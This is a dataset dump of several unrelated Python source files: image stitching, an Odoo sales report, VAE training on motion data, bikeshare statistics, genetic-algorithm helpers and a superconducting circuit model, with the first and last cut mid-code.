lineThickness)\n cv2.line(stitch_image_poly, (poly_points[1][0], poly_points[1][1]), (poly_points[2][0], poly_points[2][1]), (0, 255, 0), lineThickness)\n cv2.line(stitch_image_poly, (poly_points[2][0], poly_points[2][1]), (poly_points[3][0], poly_points[3][1]), (0, 255, 0), lineThickness)\n cv2.line(stitch_image_poly, (poly_points[3][0], poly_points[3][1]), (poly_points[0][0], poly_points[0][1]), (0, 255, 0), lineThickness)\n\n im = cv2.warpPerspective(org_img[cam2.id], cam2.M, (max_w, max_h), borderValue=0)\n cv2.imwrite(\"out/{0}.jpg\".format(cam2.id), im)\n\n cv2.fillConvexPoly(stitch_image_all, poly_points, (0, 0, 
0))\n set_roi(stitch_image_all, im, height, max_w, max_h, height_offset)\n\n '''\n resize = 0.5\n stitch_image = np.zeros((height, w, 3), np.uint8)\n set_roi(stitch_image, im, height, w, h, height_offset)\n stitch_image = cv2.resize(stitch_image, None, fx=resize, fy=resize)\n cv2.imwrite(\"out/stitch{0}.jpg\".format(index), stitch_image)\n '''\n index += 1\n\nresize = 0.50\nstitch_image_all = cv2.resize(stitch_image_all, None, fx=resize, fy=resize)\nstitch_image_poly = cv2.resize(stitch_image_poly, None, fx=resize, fy=resize)\ncv2.imwrite(\"out/stitch_image_all.jpg\", stitch_image_all)\ncv2.imwrite(\"out/stitch_image_poly.jpg\", stitch_image_poly)\n\nplot_helper.set_axes_equal(scena)\nplt.show()","sub_path":"windmill.py","file_name":"windmill.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"286936632","text":"###############################################################################\n# For copyright and license notices, see __manifest__.py file in root directory\n###############################################################################\nfrom odoo import fields, models\n\n\nclass SaleReport(models.Model):\n _inherit = 'sale.report'\n\n unit_id = fields.Many2one(\n comodel_name='product.business.unit',\n string='Business unit',\n )\n area_id = fields.Many2one(\n comodel_name='product.business.area',\n string='Area',\n )\n\n def _query(self, with_clause='', fields=None, groupby='', from_clause=''):\n if not fields:\n fields = {}\n fields['unit_id'] = ', t.unit_id as unit_id'\n fields['area_id'] = ', t.area_id as area_id'\n groupby += ', t.unit_id, t.area_id'\n return super(SaleReport, self)._query(\n with_clause, fields, groupby, from_clause)\n","sub_path":"sale_business_unit/reports/sale_report.py","file_name":"sale_report.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"528758345","text":"import os\nimport sys\nimport numpy as np\nimport scipy.io as io\n\n\n######################################\n# Logging\nimport logging\n#FORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'\nFORMAT = '[%(levelname)s: %(lineno)4d]: %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)\nlogger = logging.getLogger(__name__) ##default logger\n\n\n# Tensorboard logging. 
\ntensorboard_bLog = False \ntry:\n\tsys.path.append('../utils')\n\tfrom logger import Logger\n\ttensorboard_bLog = True\nexcept ImportError:\n\tpass\n\nimport torch\nimport torchvision\nfrom torch import nn\nfrom torch.autograd import Variable\nimport os\n\nimport modelZoo\n\n# Utility Functions\nfrom utility import print_options,save_options\nfrom utility import setCheckPointFolder\nfrom utility import my_args_parser\n\n\n######################################3\n# Parameter Handling\nparser = my_args_parser()\nargs = parser.parse_args()\n\n######################################3\n# Manual Parameter Setting\n\nargs.model ='autoencoder_3conv_vect_vae_conditional'\n#args.solver = 'sgd'\n#args.finetune = 'social_autoencoder_3conv_vae'\n#args.check_root = '/posefs2b/Users/hanbyulj/pytorch_motionSynth/checkpoint'\n#args.batch = 2\n#args.weight_kld = 0.0001\n\n# Some initializations #\ntorch.cuda.set_device(args.gpu)\n\nrng = np.random.RandomState(23456)\ntorch.manual_seed(23456)\ntorch.cuda.manual_seed(23456)\n\n\n######################################\n# Dataset \n#datapath ='/ssd/codes/pytorch_motionSynth/motionsynth_data' \ndatapath ='../../motionsynth_data/data/processed/' \n\n#train_dblist = ['data_hagglingSellers_speech_formation_30frm_5gap_white_training']\n#train_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_training']\n#test_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_testing']\n\n# train_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_testing_tiny']\n# test_dblist = ['data_hagglingSellers_speech_face_60frm_5gap_white_testing_tiny']\n\ntrain_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_training']\ntest_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_testing']\n\n# train_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_training_tiny']\n# test_dblist = ['data_hagglingSellers_speech_face_120frm_10gap_white_training_tiny']\n\ntrain_data = np.load(datapath + train_dblist[0] + '.npz')\ntrain_X_raw= train_data['clips'] #Input (numClip, chunkLengh, dim:200) \ntrain_speech_raw = train_data['speech'] #Input (numClip, chunkLengh)\n\ntest_data = np.load(datapath + test_dblist[0] + '.npz')\ntest_X_raw= test_data['clips'] #Input (numClip, chunkLengh, dim:200) \ntest_speech_raw = test_data['speech'] #Input (numClip, chunkLengh)\n\n\n# Select speech only\n# speak_time =[]\n# #Choose only speaking signal\n# for i in range(train_X_raw.shape[0]):\n# speechSignal = train_speech_raw[i,:]\n# if np.min(speechSignal)==1:\n# speak_time.append(i)\n# train_X_raw = train_X_raw[speak_time,:,:]\n\n# generate binary speech label for each sequence\ntrain_speech_binary =np.max(train_speech_raw,axis=1).astype(np.float32) \nlogger.info('train speech data: speak: {}/{} = {} '.format(sum(train_speech_binary),len(train_speech_binary), sum(train_speech_binary)/len(train_speech_binary)))\ntrain_speech_binary = np.expand_dims(train_speech_binary,1) #(batch, 1)\ntrain_speech_binary = np.expand_dims(train_speech_binary,2) #(batch, 1, 1)\n\n\n\ntrain_speech_binary = np.repeat(train_speech_binary,train_X_raw.shape[1], axis=2) ##(batch, 1, frameNum:120)\n\n\n\ntest_speech_binary =np.max(test_speech_raw,axis=1).astype(np.float32) \ntest_speech_binary = np.expand_dims(test_speech_binary,1) #(batch, 1, 1)\ntest_speech_binary = np.expand_dims(test_speech_binary,2) #(batch, 1, 1)\ntest_speech_binary = np.repeat(test_speech_binary,test_X_raw.shape[1], axis=2) ##(batch, 1, frameNum:120)\n\n\"\"\"Visualize X and Y\n#by jhugestar\nfor frameIdx in 
range(1,train_X_raw.shape[1],10):\n sys.path.append('/ssd/codes/glvis_python/')\n #from glViewer import showSkeleton,show_Holden_Data_73 #opengl visualization \n import glViewer\n glViewer.show_Holden_Data_73([ np.swapaxes(train_X_raw[1,frameIdx,:,:],0,1), np.swapaxes(train_X_raw[2,frameIdx,:,:],0,1) ] )\n\"\"\"\n\n######################################\n# Feature\nfeatureDim = 5\ntrain_X_raw = train_X_raw[:,:,:featureDim]\ntest_X_raw = test_X_raw[:,:,:featureDim]\n\n\n######################################\n# Network Setting\nnum_epochs = args.epochs #500\n#batch_size = 128\nbatch_size = args.batch\nlearning_rate = 1e-3\n\n\nmodel = getattr(modelZoo,args.model)(featureDim, args.latentDim_vae).cuda()\n# if args.autoreg ==1: #and \"vae\" in args.model:\n# model = getattr(modelZoo,args.model)(frameLeng=160).cuda()\n# else:\n# model = getattr(modelZoo,args.model)().cuda()\n#model = modelZoo.autoencoder_1conv_vect(featureDim).cuda()\n#model = modelZoo.autoencoder_1conv_vect_vae(featureDim).cuda()\n#model = modelZoo.autoencoder_3conv_vect_vae(featureDim).cuda()\n\nmodel.train()\n\n# for param in model.parameters():\n# print(type(param.data), param.size())\n\n# Loss Function #\n#criterion = nn.BCELoss()\ncriterion = nn.MSELoss()\n\n# Solver #\nif args.solver == 'adam':\n logger.info('solver: Adam')\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-5)\nelif args.solver == 'sgd':\n optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate)\n logger.info('solver: SGD')\nelif args.solver == 'adam_ams': #only for pytorch 0.4 or later.\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-5, amsgrad=True)\n logger.info('solver: Adam with AMSGrad')\nelse:\n logger.info('Unknown solver option')\n assert(False)\n\n\n######################################\n# Set Check point folder\ncheckpointFolder = setCheckPointFolder(args, model)\ncheckpointFolder_base = os.path.basename(checkpointFolder) \n\n\n######################################\n# Load pre-trained parameters\npretrain_epoch = 0\npretrain_batch_size =args.batch #Assume current batch was used in pretraining\nif args.finetune != '':\n from utility import loadPreTrained\n model, optimizer, pretrain_epoch, pretrain_batch_size = loadPreTrained(args, checkpointFolder, model, optimizer)\n\n\n######################################\n# Log file path + Tensorboard Logging\nfileHandler = logging.FileHandler(checkpointFolder+'/train_log.txt') #to File\nlogger.addHandler(fileHandler)\nif tensorboard_bLog:\n tb_logger = Logger(checkpointFolder+'/logs') #tensorboard logger\n\n# Save Option Info \noption_str, options_dict = print_options(parser,args)\nsave_options(checkpointFolder, option_str, options_dict)\n\n\n# ######################################\n# # Input/Output Option\n# train_X = train_X_raw[1,:,:,:] #1st seller, (num, frameNum, featureDim:73)\n# train_X = np.concatenate( (train_X, train_X_raw[2,:,:,:]), axis= 0) \n\n# train_Y = train_X_raw[2,:,:,:] #1st seller, (num, frameNum, featureDim:73)\n# train_Y = np.concatenate( (train_Y, train_X_raw[1,:,:,:]), axis= 0) \n\n# test_X = test_X_raw[1,:,:,:] #1st seller, (num, frameNum, featureDim:73)\n# test_Y = test_X_raw[2,:,:,:] #1st seller, (num, frameNum, featureDim:73)\ntrain_X = train_X_raw\ntest_X = test_X_raw\n\n\n# ######################################\n# Compute mean and std \ntrain_X = np.swapaxes(train_X, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n#train_Y = np.swapaxes(train_Y, 1, 2).astype(np.float32) #(num, 
featureDim, frameNum)\n\ntest_X = np.swapaxes(test_X, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n#test_Y = np.swapaxes(test_Y, 1, 2).astype(np.float32) #(num, featureDim, frameNum)\n\nXmean = train_X.mean(axis=2).mean(axis=0)[np.newaxis,:,np.newaxis] #(1, featureDim, 1)\nXstd = np.array([[[train_X.std()]]]).repeat(train_X.shape[1], axis=1) #(1, featureDim, 1)\n# Data standardization \ntrain_X = (train_X - Xmean) / Xstd\n#train_Y = (train_Y - Xmean) / Xstd\n\ntest_X = (test_X - Xmean) / Xstd\n#test_Y = (test_Y - Xmean) / Xstd\n\n# Save mean and var\nnp.savez_compressed(checkpointFolder+'/preprocess_core.npz', Xmean=Xmean, Xstd=Xstd)\n\n# Data Shuffle\nI = np.arange(len(train_X))\nrng.shuffle(I)\ntrain_X = train_X[I]\ntrain_speech_binary = train_speech_binary[I]\n#train_Y = train_Y[I]\n\nlogger.info('Input data size: {0}'.format(train_X.shape))\n\n######################################\n# Some settings before training\nif train_X.shape[0] < batch_size:\n batch_size = train_X.shape[0]\ncurBestloss = 1e3\n#Compute stepNum start point (to be continuos in tensorboard if pretraine data is loaded)\nfilelog_str = ''\nstepNum = pretrain_epoch* len(np.arange(train_X.shape[0] // pretrain_batch_size))\n\n\n######################################\n# Training\nfor epoch in range(num_epochs):\n\n model.train()\n\n batchinds = np.arange(train_X.shape[0] // batch_size)\n rng.shuffle(batchinds)\n \n # Each Batch\n avgLoss =0\n avgReconLoss = 0\n avgKLDLoss = 0\n cnt = 0\n for bii, bi in enumerate(batchinds):\n\n idxStart = bi*batch_size\n inputData_np = train_X[idxStart:(idxStart+batch_size),:,:] #(batch, featureDim, frameNum)\n\n inputdata_speech = train_speech_binary[idxStart:(idxStart+batch_size)]*100 ##(batch, 1, 120)\n\n inputData_np = np.concatenate( (inputData_np,inputdata_speech), axis=1) #(batch, featureDim+1, frameNum)\n inputData = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum)\n\n inputData_speech_cuda = Variable(torch.from_numpy(inputdata_speech[:,:,0])).cuda() \n #outputGT = Variable(torch.from_numpy(outputData_np)).cuda() #(batch, 73, frameNum)\n #outputGT = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum) \n\n\n #################### VAE Only #################### \n # ===================forward=====================\n output, mu, logvar = model(inputData, inputData_speech_cuda)\n #loss = criterion(output, inputData)\n #loss = modelZoo.vae_loss_function(output, inputData, mu, logvar,criterion)\n #loss, recon_loss, kld_loss = modelZoo.vae_loss_function(output, inputData, mu, logvar,criterion,args.weight_kld)\n loss, recon_loss, kld_loss = modelZoo.vae_loss_function(output, inputData[:,:-1,:], mu, logvar,criterion,args.weight_kld) #ignore label in the inputData\n \n\n # ===================backward====================\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # ===================log========================\n # print('model: {}, epoch [{}/{}], loss:{:.4f} (recon: {:.4f}, kld {:.4f})'\n # .format(checkpointFolder_base, epoch +pretrain_epoch, num_epochs, loss.item(), recon_loss.item(), kld_loss.item()))\n avgLoss += loss.item()*batch_size\n avgReconLoss += recon_loss.item()*batch_size\n avgKLDLoss += kld_loss.item()*batch_size\n\n if tensorboard_bLog:\n # 1. 
Log scalar values (scalar summary)\n if int(torch.__version__[2])==2:\n info = { 'loss': loss.data[0] }\n else:\n info = { 'loss': loss.item(), 'reconLoss': recon_loss.item(), 'kldLoss': kld_loss.item() }\n\n for tag, value in info.items():\n tb_logger.scalar_summary(tag, value, stepNum)\n \n stepNum = stepNum+1\n\n ######################################\n # Logging\n temp_str = 'model: {}, epoch [{}/{}], avg loss:{:.4f} (recon: {:.4f}, kld: {:.4f})'.format(checkpointFolder_base, epoch +pretrain_epoch, num_epochs,\n avgLoss/ (len(batchinds)*batch_size),\n avgReconLoss/ (len(batchinds)*batch_size),\n avgKLDLoss/ (len(batchinds)*batch_size)\n )\n logger.info(temp_str)\n \n\n\n\n ######################################\n # Check Testing Error\n batch_size_test = batch_size\n test_loss = 0\n test_avgReconLoss = 0\n test_avgKLDLoss = 0\n cnt =0.0\n\n model.eval()\n batchinds = np.arange(test_X.shape[0] // batch_size_test)\n for bii, bi in enumerate(batchinds):\n\n idxStart = bi*batch_size\n inputData_np = test_X[idxStart:(idxStart+batch_size),:,:]\n #outputData_np = test_Y[idxStart:(idxStart+batch_size),:,:]\n\n inputdata_speech = test_speech_binary[idxStart:(idxStart+batch_size)]*100 ##(batch, 1, 120)\n inputData_np = np.concatenate( (inputData_np,inputdata_speech), axis=1) #(batch, featureDim+1, frameNum)\n\n inputData = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum)\n inputData_speech_cuda = Variable(torch.from_numpy(inputdata_speech[:,:,0])).cuda() \n \n #outputGT = Variable(torch.from_numpy(outputData_np)).cuda() #(batch, 73, frameNum)\n #outputGT = Variable(torch.from_numpy(inputData_np)).cuda() #(batch, 73, frameNum)\n\n\n\n # ===================forward=====================\n output, mu, logvar = model(inputData, inputData_speech_cuda)\n\n if isinstance(output, tuple):\n output = output[0]\n #loss = criterion(output, outputGT)\n\n if \"vae\" in model.__class__.__name__:\n loss, recon_loss, kld_loss = modelZoo.vae_loss_function(output, inputData[:,:-1,:], mu, logvar, criterion, args.weight_kld)\n \n test_loss += loss.item()*batch_size_test\n test_avgReconLoss += recon_loss.item()*batch_size_test\n test_avgKLDLoss += kld_loss.item()*batch_size_test\n\n else:\n loss = criterion(output, inputData) #Just recon loss only\n\n test_loss += loss.item()*batch_size_test\n #test_loss += loss.data.cpu().numpy().item()* batch_size_test # sum up batch loss\n\n\n test_loss /= len(batchinds)*batch_size_test\n test_avgReconLoss /= len(batchinds)*batch_size_test\n test_avgKLDLoss /= len(batchinds)*batch_size_test\n \n logger.info(' On testing data: average loss: {:.4f} (recon: {:.4f}, kld: {:.4f})|| (best {:.4f})\\n'.format(test_loss, test_avgReconLoss, test_avgKLDLoss, curBestloss))\n if tensorboard_bLog:\n #info = { 'test_loss': test_loss }\n info = { 'test_loss': test_loss, 'test_reconLoss': test_avgReconLoss, 'test_KLDLoss': test_avgKLDLoss }\n for tag, value in info.items():\n tb_logger.scalar_summary(tag, value, stepNum)\n \n bNewBest = False\n if curBestloss > test_loss:\n curBestloss = test_loss\n bNewBest = True\n\n ######################################\n # Save parameters, if current results are the best\n if bNewBest or (epoch + pretrain_epoch) % args.checkpoint_freq == 0:\n #if (epoch + pretrain_epoch) % 1 == 0:\n fileName = checkpointFolder+ '/checkpoint_e' + str(epoch + pretrain_epoch) + '_loss{:.4f}'.format(test_loss) + '.pth'\n torch.save(model.state_dict(), fileName)\n fileName = checkpointFolder+ '/opt_state.pth' #overwrite\n torch.save(optimizer.state_dict(), 
fileName)\n #torch.save(model, fileName)\n","sub_path":"motionsynth_code/autoencoder_face/train_social_condition.py","file_name":"train_social_condition.py","file_ext":"py","file_size_in_byte":15082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"11193616","text":" #Libraries used in project#\nimport time\nimport pandas as pd\nimport numpy as np\nfrom datetime import date\n\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\ndf=CITY_DATA\n\ndef get_filters(welcome=True):\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n #Welcome message isn't displayed if user input is incorrect and the user is asked to reenter information\"\n if welcome:\n print('Hello! Let\\'s explore some US bikeshare data!')\n\n city=input(\"Which city would you like to explore?\").lower().strip()\n\n month=input(\"Which month are you going to explore; January, February, March, April, May or June?\").lower().strip()\n\n day=input(\"Which day of the week are you going to explore?\").lower().strip()\n return [city, month, day]\n\n\ndef load_data(city, month, day):\n \"\"\"\n Creates a dataframe with filtered data based on user input.\n If user input is incorrect or other than expected an empty object None is returned instead of a dataframe.\n \"\"\"\n\n # load data from the correct csv file based on user choice #\n if city in CITY_DATA:\n folder='/Users/theresesvensson/Documents/Other projects/Udacity/bikeshare-2/'\n path=folder+CITY_DATA[city]\n df=pd.read_csv(path)\n else:\n print('No data available for {}. Please choose between chicago, washington, new york city. Please make sure your spelling is correct.'.format(city))\n return None\n # convert the Start Time column to datetime\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n # controll that user input is correct #\n if month in months:\n pass\n else:\n print('No data available for {}. Please choose between the available months. Please make sure your spelling is correct.'.format(month))\n return None\n if day in ['monday', 'tuesday','wednesday','thursday','friday','saturday','sunday']:\n pass\n else:\n print('No data available for {}. 
Please make sure your spelling is correct'.format(day))\n return None\n # extract month and day of week from Start Time to create new columns #\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n #month=months.index(month)+1\n df=df[df['month']==(months.index(month)+1)]\n df = df[df['day_of_week'] == day.title()]\n return df\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef station_stats(df, city, month, day):\n \"\"\"Displays statistics on the most popular stations.\"\"\"\n\n print('\\nCalculating The Most Popular Stations...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n start_station=df['Start Station']\n print('The most popular start station in {} on {}s in {} is: '.format(city, day, month))\n print(start_station.value_counts().head(1))\n\n # display most commonly used end station\n end_station=df['End Station']\n print('The most popular end station in {} on {}s in {} is: '.format(city, day, month))\n print(end_station.value_counts().head(1))\n\n # display most frequent combination of start station and end station trip\n mytable = df.groupby(['Start Station','End Station']).size()\n pop_stations=df.groupby(['Start Station','End Station']).size().reset_index().rename(columns={0:'count'})\n most_popular=pop_stations.sort_values(by='count', ascending=False).head(1)\n print('The most popular trip is:')\n print(most_popular)\n\n print(\"\\nThis took %s seconds to calculate.\" % (time.time() - start_time))\n print('-'*40)\n\ndef trip_duration_stats(df, city, month, day):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n trip_duration=df['Trip Duration']\n print('The total travel time for {}s in {} in {} is {} seconds'.format(day, month, city, int(sum(trip_duration))))\n\n corr_days=sum(trip_duration)/(60*60*24)\n print('This corresponds to {} days'.format(int(corr_days)))\n\n # display mean travel time\n print('The avarage travel time per trip for the choosen period is {0:.0f} seconds'.format((sum(trip_duration)/len(trip_duration))))\n\n\n print(\"\\nThis took %s seconds to calculate.\" % (time.time() - start_time))\n print('-'*40)\n\ndef user_stats(df,city):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('The distribution of users using our service in this period is the following:')\n print(df['User Type'].value_counts())\n\n\n # Display counts of gender\n if city != 'washington':\n most_common_gender=df['Gender'].mode().values\n print('Most of our users in this period are {}'.format(most_common_gender))\n # Display earliest, most recent, and most common year of birth\n today=date.today()\n latest_byear=df['Birth Year'].max()\n earliest_byear=df['Birth Year'].min()\n most_common_byear=df['Birth Year'].mode().values\n print('The most senior user during the choosen period was born {0:.0f}'.format(earliest_byear))\n print('The youngest user during the choosen period was born {0:.0f}'.format(latest_byear))\n print('Our service seem to be most popular among users born in {} based upon 
that is the most common birth year among users during the choosen period'.format(most_common_byear))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef passenger_stats(df,city):\n \"\"\"\n Calculates the mean age of passengers travelling during the period choosen by the user\n \"\"\"\n if city != 'washington':\n print('\\nCalculating statistics about travellers...\\n')\n #Calculate the avarage birth date, thereafter calculate how old people born that year are today #\n today=date.today()\n accum_age=0\n agelist=[]\n mean_birth_year=df['Birth Year'].mean()\n #age=today.year - mean_birth_year\n print('The avarage age for passengers travelling during this period in this region is {0:.0f} years'.format(today.year - mean_birth_year))\n\n\ndef main():\n #First time when called apon; define df and set display welcome message variable to true. #\n #This so that welcome message isn't displayed if user makes a mistake and has to reenter values#\n df=None\n disp_welcome_msg=True\n #While loop to give users the possiblity to reenter values when incorrect input has been recognized #\n while df is None:\n input=get_filters(welcome=disp_welcome_msg)\n city, month, day = input\n disp_welcome_msg=False\n df=load_data(city,month,day)\n station_stats(df, city, month, day)\n trip_duration_stats(df, city, month, day)\n user_stats(df,city)\n passenger_stats(df,city)\n #print(df.head(5))\n\n\n\nif __name__ == \"__main__\":\n \tmain()\n","sub_path":"bikeshare copy.py","file_name":"bikeshare copy.py","file_ext":"py","file_size_in_byte":7505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"211252851","text":"import random\nfrom operator import itemgetter\nfrom statistics import mean, stdev\n\nimport numpy as np\n\nfrom diffusion import icm, ltm\n\n\ndef calculate_fitness(g, seeds, model, iterations=10, p=0.01):\n\t\"\"\"\n\tCalculate the fitness for a set of seeds\n\n\t:param g: An ig.Graph object\n\t:param seeds: The set of initial active nodes\n\t:param model: The diffusion model ('icm', 'ltm')\n\t:param iterations: The number of iterations\n\t:param p: The activation probability (used only when model is 'icm')\n\n\t:return: The statistics of the diffusion (mean, min, max, standard deviation)\n\t\"\"\"\n\tif model == 'icm':\n\t\tinfluence_model = icm\n\t\tparams = {'graph': g, 'seeds': seeds, 'p': p}\n\telif model == 'ltm':\n\t\tinfluence_model = ltm\n\t\tparams = {'graph': g, 'seeds': seeds}\n\n\tactivations = []\n\t# Performs the IC or LT\n\tfor i in range(iterations):\n\t\tfitness = influence_model(**params)\n\t\tactivations.append(len(fitness))\n\n\treturn mean(activations), min(activations), max(activations), stdev(activations)\n\n\ndef get_unranked_nodes(g, seeds=None):\n\tn = len(g.vs)\n\td = g.degree()\n\tvindex = [i for i in range(n)]\n\tcut = np.percentile(d, 75)\n\tvertices = sorted(zip(vindex, d), key=lambda x: x[1], reverse=True)\n\tindices = [i[0] for i in vertices if i[1] >= cut]\n\tif seeds:\n\t\tindices = list(set(indices) - set(seeds))\n\trandom.shuffle(indices)\n\treturn indices\n\n\ndef replace_duplicates(chromossome, mapping, seeds, vertices):\n\tduplicates = [(idx, item) for idx, item in enumerate(chromossome) if item in chromossome[:idx]]\n\tused_seeds = [v for v in chromossome if v in seeds]\n\tused_vertices = [v for v in chromossome if v in vertices]\n\tseeds = list(set(seeds) - set(used_seeds))\n\tvertices = list(set(vertices) - set(used_vertices))\n\tfor idx, v in duplicates:\n\t\tif 
mapping[idx] == 0:\n\t\t\tv = random.choice(vertices)\n\t\t\tvertices.remove(v)\n\t\telse:\n\t\t\tv = random.choice(seeds)\n\t\t\tseeds.remove(v)\n\t\tchromossome[idx] = v\n\n\ndef replace_gene(chromossome, idx, seeds, vertices):\n\tused_seeds = [v for v in chromossome if v in seeds]\n\tused_vertices = [v for v in chromossome if v in vertices]\n\tseeds = list(set(seeds) - set(used_seeds))\n\tvertices = list(set(vertices) - set(used_vertices))\n\tif chromossome.mapping[idx] == 0:\n\t\tif len(vertices) > 0:\n\t\t\tv = random.choice(vertices)\n\t\t\tvertices.remove(v)\n\t\telse:\n\t\t\tv = random.choice(seeds)\n\t\t\tseeds.remove(v)\n\telse:\n\t\tif len(seeds) > 0:\n\t\t\tv = random.choice(seeds)\n\t\t\tseeds.remove(v)\n\t\telse:\n\t\t\tv = random.choice(vertices)\n\t\t\tvertices.remove(v)\n\tchromossome[idx] = v\n\n\ndef fitness_eletism(population, ch1, ch2):\n\tfitness = [(idx, c.fit) for idx, c in enumerate(population.chromossomes)]\n\tnew_individuals = sorted([(ch1.fit, ch1), (ch2.fit, ch2)], key=itemgetter(0))\n\n\tfor fit, ch in new_individuals:\n\t\tif any(fit > f for idx, f in fitness):\n\t\t\tlowest = min(fitness, key=itemgetter(1))\n\t\t\tfitness.remove(min(fitness, key=itemgetter(1)))\n\t\t\tpopulation.chromossomes[lowest[0]] = ch\n\n\ndef parents_eletism(population, ch1, ch2, idx1, idx2):\n\tpopulation.chromossomes[idx1] = ch1\n\tpopulation.chromossomes[idx2] = ch2\n","sub_path":"ga_helper.py","file_name":"ga_helper.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40428203","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 27 14:13:01 2017\n\n@author: leghtas\n\"\"\"\nimport qutip as qt\nimport scipy.constants as sc\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.linalg as sl\nimport numpy.linalg as nl\nfrom scipy.optimize import minimize, least_squares\nimport numdifftools as nd\nfrom scipy.misc import derivative\nimport circuit as c\nimport sympy as sp\nfrom sympy.parsing.sympy_parser import parse_expr\n\nhbar=c.hbar\npi=c.pi\nphi0=c.phi0\ne=c.e\n\nclass CircuitSnailPA(c.Circuit):\n\n def __init__(self, EC, EL, EJ, alpha, n, NN=1, ECj = None,\n printParams=True):\n \n # from http://arxiv.org/abs/1602.01793\n w, Z, LJ = c.get_w_Z_LJ_from_E(EC, EL, EJ)\n phi = (1/phi0) * (np.sqrt((hbar/2)*Z)) # phiZPF\n n_zpf = (1/(2*e)) * (np.sqrt(hbar/2/Z)) # nZPF\n C = 1/(Z*w)\n L = Z/w\n omega_plasma = 2*pi*24e9\n CJ = 1/(omega_plasma**2*(2*LJ)) # each junction has 2*LJ\n if ECj == None:\n ECj = e**2/2/CJ\n \n # Fixed parameters should be given as class attribute\n self.ECj = ECj\n self.EL = phi0**2/L\n self.EC = e**2/2/C\n self.EJ = EJ\n self.n = n\n self.NN = NN\n self.alpha = alpha\n \n # Varying parameters should be stored in this dictionary\n self.varying_params={'phi_ext_0':0}\n \n self.U_str = 'EL/hbar*pr**2 \\\n -NN*alpha*(EJ/hbar)*cos(ps/NN) \\\n -NN*(n-1)*(EJ/hbar)*cos((NN*phi_ext_0-ps)/n/NN) \\\n -NN*1*(EJ/hbar)*cos(pi-(NN*phi_ext_0-ps)/n/NN)'\n \n self.T_str = '(1/32.)*(hbar/EC)*(2*dpr-dps)**2 \\\n + (1/16.)*(1/NN)*(alpha+1/n)*(hbar/ECj)*(dps)**2'\n \n\n if printParams:\n print(\"w = \"+str(w/2/np.pi*1e-9)+\"GHz\")\n print(\"Z = \"+str(Z)+\"Ohm\")\n print(\"L = \"+str(L*1e9)+\" nH\")\n print(\"C = \"+str(C*1e15)+\" fF\")\n print(\"LJ = \"+str(LJ*1e9)+\" nH\")\n print(\"exp_f = \"+str(1/((L+LJ)*C)**0.5*1e-9)+\" GHz\")\n print(\"EL/h = \"+str(1e-9*self.EL/hbar/2/pi)+\" GHz\")\n print(\"EC/h = \"+str(1e-9*self.EC/hbar/2/pi)+\" GHz\")\n print(\"EJ/h = 
